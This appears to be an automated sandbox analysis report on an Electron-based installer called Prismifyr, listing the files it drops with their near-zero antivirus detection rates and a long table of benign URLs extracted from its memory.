C:\Users\user\AppData\Local\Programs\Prismifyr_Installer_v2.1\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\1b6e99aa-5e17-4930-922d-0fcfed46e003.tmp.node0%ReversingLabs
C:\Users\user\AppData\Local\Temp\d9f7e9ec-5589-4098-b546-c97c7020ff02.tmp.node3%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\d3dcompiler_47.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\ffmpeg.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libEGL.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\libGLESv2.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\resources\elevate.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vk_swiftshader.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\7z-out\vulkan-1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\SpiderBanner.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\StdUtils.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\System.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsExec.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\nsyC753.tmp\nsis7z.dll0%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://openjsf.org/0%URL Reputationsafe
http://exslt.org/common0%URL Reputationsafe
https://sizzlejs.com/0%URL Reputationsafe
No contacted domains info
NameSourceMaliciousAntivirus DetectionReputation
https://github.com/npm/move-filePrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
    unknown
    https://github.com/simplejson/simplejsonPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
      unknown
      https://github.com/c4milo/v8-profiler/blob/master/binding.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
        unknown
        https://support.google.com/chrome/answer/6098869Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461709634.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463431471.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2465750451.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470168099.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463544080.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473941850.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2466551233.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472419715.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2461642034.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462040884.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2472028493.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462894354.000000000594C000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2464652978.0000000002E01000.00000004.00000020.00020000.00000000.sdmpfalse
          unknown
          https://www.bluetooth.com/specifications/gatt/servicesPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
            unknown
            https://github.com/WebBluetoothCG/web-bluetooth/blob/main/implementation-status.mdPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
              unknown
              http://crbug.com/122592Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                unknown
                https://www.chromestatus.com/feature/5093566007214080Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                  unknown
                  https://chrome.google.com/webstore?hl=fi&category=theme81https://myactivity.google.com/myactivity/?uPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmpfalse
                    unknown
                    https://github.com/TooTallNate/node-time/blob/master/binding.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                      unknown
                      https://docs.python.org/2/library/tempfile.html#tempfile.mkstempPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                        unknown
                        https://github.com/tc39/proposal-weakrefsPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                          unknown
                          https://goo.gl/t5IS6M).Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                            unknown
                            https://github.com/jprichardson/node-jsonfile#readfilesyncfilename-options).Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                              unknown
                              https://github.com/nodejs/node/issues/44985Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                unknown
                                https://registry.npmjs.org/bindings/1.0.0Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://url.spec.whatwg.org/#concept-urlencoded-serializerPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                    unknown
                                    https://chrome.google.com/webstore?hl=sk&category=theme81https://myactivity.google.com/myactivity/?uPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471755683.0000000002E01000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://url.spec.whatwg.org/#dom-urlsearchparams-urlsearchparamsPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                        unknown
                                        https://github.com/rbranson/node-ffi/blob/master/deps/libffi/libffi.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                          unknown
                                          https://semver.org/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://github.com/google/pprof/tree/master/protoPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                              unknown
                                              https://openjsf.org/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://github.com/jrmuizel/qcms/tree/v4Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                unknown
                                                https://chromium.googlesource.com/chromium/src/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://github.com/luismreis/node-openvg-canvas/blob/master/binding.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://github.com/nickdesaulniers/node-nanomsg/blob/master/binding.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://w3c.github.io/manifest/#installability-signalsPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://exslt.org/commonPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://github.com/npm/cacachePrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://github.com/tensorflow/modelsPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://github.com/KhronosGroup/SPIRV-Headers.gitPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://github.com/w3c/ServiceWorker/issues/1356.PropertyPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://github.com/lloyd/node-memwatch/blob/master/binding.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://code.google.com/p/gyp/issues/detail?id=411Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    http://istanbul-js.org/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://github.com/tensorflow/tflite-supportPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://github.com/WICG/scheduling-apisPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://pypi.org/project/pyparsingPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            unknown
                                                                            https://sqlite.org/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://code.google.com/p/chromium/issues/detail?id=25916Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://webidl.spec.whatwg.org/#abstract-opdef-converttointPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  http://crbug.com/333738.Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    http://www.sqlite.org/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270865746.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://developer.chrome.com/docs/extensions/mv3/service_workers/events/ScriptPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txtPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://sizzlejs.com/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://github.com/request/request/blob/b12a6245/lib/redirect.js#L134-L138Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            http://www.portaudio.comPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://beacons.gcp.gvt2.com/domainreliability/uploadPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000007014000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://w3c.github.io/aria/#aria-hidden.Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://developer.chrome.com/docs/extensions/mv3/cross-origin-isolation/.Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://github.com/WICG/construct-stylesheets/issues/119#issuecomment-588352418.Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://github.com/google/shell-encryptionPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://heycam.github.io/webidl/#es-iterable-entriesPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://github.com/developmentseed/node-sqlite3/blob/master/deps/sqlite3.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://github.com/wasdk/wasmparserPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://heycam.github.io/webidl/#es-interfacesPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://github.com/nodejs/node-gyp/labels/ERR%21%20node-gyp%20-v%20%3C%3D%20v5.1.0)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://goo.gl/4NeimXOriginPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://encoding.spec.whatwg.org/#encode-and-enqueue-a-chunkPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://tc39.github.io/ecma262/#sec-object.prototype.tostringPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://github.com/dpranke/typ.gitPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://chromeenterprise.google/policies/#BrowserSwitcherUrlListPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463742634.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2467364499.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2463019604.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2473239852.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462501774.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2470963987.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2462787961.0000000002E01000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2471213086.0000000002E01000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://github.com/npm/ssriPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://streams.spec.whatwg.org/#example-manual-write-with-backpressurePrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://html.spec.whatwg.org/multipage/timers-and-user-prompts.html#dom-setintervalPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://www.khronos.org/registry/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://github.com/rvagg/node-leveldown/blob/master/binding.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://heycam.github.io/webidl/#dfn-iterator-prototype-objectPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392473853.0000000006B20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://tootallnate.net)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://github.com/requests/toolbeltPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2402622275.0000000005229000.00000004.00000020.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2231920283.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://android.com/payPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://nodejs.org/static/images/favicons/favicon.icofaviconUrldevtoolsFrontendUrldevtoolsFrontendUrPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                http://web.archive.org/Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270572239.0000000005E20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://nodejs.org/en/docs/inspectorForPrismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://xhr.spec.whatwg.org/.Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.0000000006F23000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      http://crbug.com/142362.Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://www.chromestatus.com/feature/6662647093133312Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://github.com/rvagg/node-leveldown/blob/master/deps/snappy/snappy.gyp)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmp, Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2474993997.0000000005226000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://github.com/nodejs/gyp-next/releases)Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2270289608.0000000005A20000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://crbug.com/1144908Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://datatracker.ietf.org/doc/draft-ietf-rtcweb-ip-handling.Prismifyr_Installer_v2.1 Setup 1.0.0.exe, 00000000.00000003.2392791609.00000000070AE000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
